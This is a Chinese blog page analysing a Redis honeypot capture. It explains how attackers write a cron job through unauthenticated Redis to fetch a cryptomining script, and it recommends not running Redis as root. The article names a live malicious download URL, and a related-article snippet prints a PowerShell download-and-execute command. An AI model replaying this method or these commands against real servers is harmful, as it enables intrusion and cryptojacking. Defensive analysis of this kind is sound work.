怎么在Linux下通过redis漏洞植入病毒?

最新推荐文章于 2023-01-11 22:46:30 发布
最新推荐文章于 2023-01-11 22:46:30 发布
阅读量823 收藏 1
点赞数 2
分类专栏: 黑客技术 安卓逆向 ARM 文章标签: linux redis shell 安全漏洞 反病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hacker_by_V/article/details/114952327
版权
安卓逆向 同时被 3 个专栏收录
28 篇文章 4 订阅
订阅专栏
黑客技术
8 篇文章 0 订阅
订阅专栏
ARM
3 篇文章 0 订阅
订阅专栏

Linux下通过redis漏洞植入病毒的流程

经常看到有人在linux下被植入挖矿病毒,而植入病毒的方式多种多样,但通过redis漏洞的方式却是经常见到的,根本原因是系统管理者的安全意识匮乏。多的不说,咱们来看看具体的操作-----------

正好最近比较好奇,于是安装了一个redis蜜罐的捕获来展示如何通过漏洞来植入病毒。
在这里插入图片描述
原始日志比这个更多,但这里的片段足够展示整个攻击流程。因为有些人可能对redis命令不熟悉,以下我将逐步的讲解以下流程

在这里插入图片描述
这里设置了一个计划任务的内容,目的就是从远程的服务器下载一个植入病毒的脚本(http://helpdeskserver.epelcdn.com/dd210131/init.sh)。注意这里虽然是一行,但事实上执行的时候其实是2行。现在光到这里是没用的,因为现在这些数据还都保存在内存中,cron是没法执行的。

剩下的步骤就是设置计划任务脚本写入的目录并且恢复redis的备份。

当以上操作都完成的时候,redis在触发备份机制后就会开始往上面设置好的目录写入计划任务的脚本
而计划任务会在每分钟都去执行一次这个脚本并且触发下载病毒的机制。然后你的机器CPU就会开始飙涨了。

如果大家有兴趣可以下载看下init.sh这个脚本,里面有剩余安装病毒的全过程,并且还有狗咬狗的去删除自己的竞争对手的机制。

总结:
其实这个漏洞很封堵很简单,只要执行redis的用户没有权限往/var/spool下的目录能写入就能防止入侵。但由于很多人安装redis的时候都是从网上找了文章,启动的时候往往就是root用户直接执行,这样redis也就具有了root用户的权限。

Hacker_by_V
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux服务器被植入挖矿病毒后初步解决方案
qq_24274689的博客
07-22 3728
linux服务器被植入挖矿病毒后初步解决方案
怎么快速在计算机植入病毒,怎样给别人的电脑植入病毒
热门推荐
weixin_36310597的博客
07-26 1万+
太简单了。这是病毒植入系统的一种表现,你删了也没用,因为这种系统植入性的病毒一般是能够修改系统注册表的,所以你删掉它会通过注册表再重新创建一摸一样的文件。建议你用以下方法解决,如果这还不行,建议重装系统:1.首先,你调出你杀毒软件的记录,然后找到这个文件的路径。2.下载冰剑(icesword)这个软件,并安装。这个软件是业内最好用的修改底层文件的软件,用它连系统核心文件都可以强行删除。3.重启,进...
linux c恶意代码,攻击者如何向正在运行的Linux进程注入恶意代码
weixin_29337389的博客
05-13 751
概述目前,已经有很多详细的技术文章,讲解攻击者是如何将被感染的文件注入到二进制代码中,以便下次启动受感染的程序时执行恶意代码。但是,针对正在运行的进程,攻击者可以采取什么方式实现感染呢?本文将主要介绍攻击者如何在内存中向正在运行的进程实现注入,换而言之,本文主要介绍如何编写自己的调试器。相关研究成果在展开细节之前,我们首先介绍一些相关的基础知识和研究成果。我们的第一个示例与恶意软件无关,而是一个多...
Linux Redis自动化挖矿感染蠕虫分析及安全建议
A_991128a的博客
01-11 387
自从Redis未授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行为一直层出不穷;而在众多利用该问题入侵服务器进行黑产行为的案例中,其中就存在一类利用该问题进行挖矿并且会利用pnscan自动扫描感染其他机器;该类攻击一直存在,不过在近期又呈现数量增加的趋势,在最近捕获到多次,我们针对其做下具体的分析。
服务器是如何被植入挖矿程序的
Amy安的博客
08-17 2299
首先,攻击者利用Sqlserver应用的弱口令漏洞,并借助Sqlserver自身的命令执行组件执行cmd命令 "C:\Windows\system32\cmd.exe" /c whoami whoami是操作系统中用于查看当前有效用户名的命令 执行ps命令 powershell -c "iex((new-object Net.WebClient).DownloadString('恶意链接'))" or "C:\Windows\system32\cmd.exe" /c powershell -c "iex(
linux系统下安装redis的方法
09-09
Linux系统中安装Redis是一个常见的任务,特别是在搭建服务器或开发分布式缓存系统时。Redis是一个高性能的键值存储系统,广泛用于数据缓存、消息队列以及数据库等场景。以下是详细步骤,帮助你在Linux上安装Redis...
linux离线安装redis
最新发布
01-20
Linux环境中离线安装Redis是常见的需求,尤其是在内网服务器上,由于无法直接访问公网,我们需要提前下载Redis的源码包并手动安装。下面将详细解释如何进行这一过程。 首先,你需要从Redis官方网站获取Redis的...
linux下安装redis
10-28
由于 Redis 官方并没有提供 Windows 版本的下载,因此我们只能在 Linux 环境下进行安装。下载完成后,将压缩包上传至 Linux 服务器。 #### 二、安装 Redis 1. **解压 Redis 包** 使用命令 `tar -zxvf redis-...
linux下的redis安装包含配置文件
09-29
总之,安装和配置RedisLinux下并不复杂,但需要根据实际需求进行细致的调整,确保系统的高效和可靠。理解并掌握配置文件中的各项设置,对于管理和优化Redis实例至关重要。在实际操作过程中,一定要仔细检查每一项...
Linux下安装Redis并设置相关服务
09-10
RedisLinux下的安装与服务配置】 Redis是一个高性能的键值存储系统,它以其极快的速度、丰富的数据类型以及强大的持久化能力而受到广大开发者喜爱。Redis的优势在于其完全内存化存储、原子性操作以及多用途特性...
redis未授权访问致远程植入挖矿脚本
煮酒闲谈
12-19 1744
前言遇到安全事件发生的时候,我们往往会有相应的处理流程与方法,但是作为一个萌新来说,对于安全事件的处理即应急响应还是比较陌生的,于是今天分享这样一篇文章。 安全应从小事做起,从细节做起 本文转载自<我的世界安全观>作者会不定期的更新一些与安全技术相关的干货,欢迎大家关注。1 安全事件描述1.1 开发服务器被勒索主机xx.xx.xx.xx出现异常:cpu高达700%,且登录出现访问外链的异常提醒:
【挖矿木马追踪】GuardMiner团伙
Websec
03-10 2793
原文章:https://s.tencent.com/research/report/1265.html 该挖矿木马具备较强的自动化攻击和扩散感染能力; l攻击成功后的恶意脚本会关闭linux防火墙,使系统安全性进一步下降; l会禁用或卸载多款云主机安全软件; l从比特币交易记录中动态获取C2地址; l会清除竞品挖矿木马,杀死CPU占用超过40%的进程; l依次下载挖矿程序、守护程序和攻击程序; l通过通过安装crontab任务、写入SSH authorized_key...
惊现!服务器为什么被植入了挖矿病毒
YingJH
04-28 2366
去年服务器遇到被比特币勒索的病毒,可以看下这篇: 《ElasticSearch安全问题不容忽视,被黑客勒索0.1个比特币》 现在服务器又遇到被挖矿程序植入病毒,下面就来简单说下我遇到的安全问题。 现在的时代,区块链技术很火,也有很大的泡沫。一直有挖矿的机器时刻在跑着,所以也会有人弄些程序病毒植入别人的机器,帮他们挖“宝藏”。 今天,看着自己的网站出现504,应该就是挂了...
云主机被挖矿病毒感染的处理过程
小明和一群狗子们
05-27 5951
舍友在宿舍喊着,我的这个云主机好卡啊,难受啊!我让他用top命令看一下CPU占用。 一看吓一跳,一个叫做sysupdate的进程占据了绝大部分的CPU资源。CPU使用率接近100%。 看来肯定是被当矿机了。 清除过程 这个病毒还不是算很变态,很多挖矿病毒,使用top命令都看不到挖矿程序的进程。 基本可以确定这个占据绝大部分cpu资源的进程sysupdate,就是挖矿程序了,我们需要先找到他。 使...
服务器被植入挖矿程序 该怎么查杀挖矿病毒
网站安全专家
06-06 9013
阿里云ECS服务器是目前很多网站客户在使用的,可以使用不同系统在服务器中,windows2008 windows2012,linux系统都可以在阿里云服务器中使用,前段时间我们SINE安全收到客户的安全求助,说是收到阿里云的短信提醒,提醒服务器存在挖矿进程,请立即处理的安全告警。客户网站都无法正常的打开,卡的连服务器SSH远程连接都进不去,给客户造成了很大的影响。 随即我们SINE安全工程师...
挖矿病毒解决实例(隐藏进程,文章较好)(入侵)
墨痕诉清风的博客
01-06 1万+
CPU起飞了 最近有朋友在群里反馈,自己服务器的CPU一直处于高占用状态,但用top、ps等命令却一直找不到是哪个进程在占用,怀疑中了挖矿病毒,急的团团转。 根据经验,我赶紧让他看一下当前服务器的网络连接,看看有没有可疑连接,果然发现了有点东西: 上Shodan查一下这IP地址: 反向查找,发现有诸多域名曾经解析到这个IP地址: 这是一个位于德国的IP地址,开放了4444,5555,7777等数个特殊的服务端口: 其中这位朋友服务器上发现的连接到的是7777端口,
排查通过服务器中 redis漏洞植入 pnscan 病毒进行挖矿
pkyShare 的博客
05-17 837
1 描述   最近买了一台云服务器进行学习研究,然后装了 redis,怎想到了某天晚上 22:00 开始服务器就卡顿了,输入命令半天没响应,然后重新连接则多次超时。最后连接上去了,输入命令 uptime ,显示如下图:   我的服务器是 1 核心的,信息显示有另一个用户,而且后面三个参数都超过了 1,表示当前 CPU 严重过载。   再在云服务器管理页面查看可视化界面,如下图:   没遇到过这种情况,然后就提交了工单叫云服务器人员帮忙处理。 2 结果与分析   结果是攻击者通过 redis安全漏洞植入
linux下通过网址下载redis
06-09
可以通过以下命令在 Linux 下下载 Redis: ```shell $ wget http://download.redis.io/releases/redis-6.2.5.tar.gz ``` 其中,`http://download.redis.io/releases/redis-6.2.5.tar.gz` 是 Redis 的下载地址,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值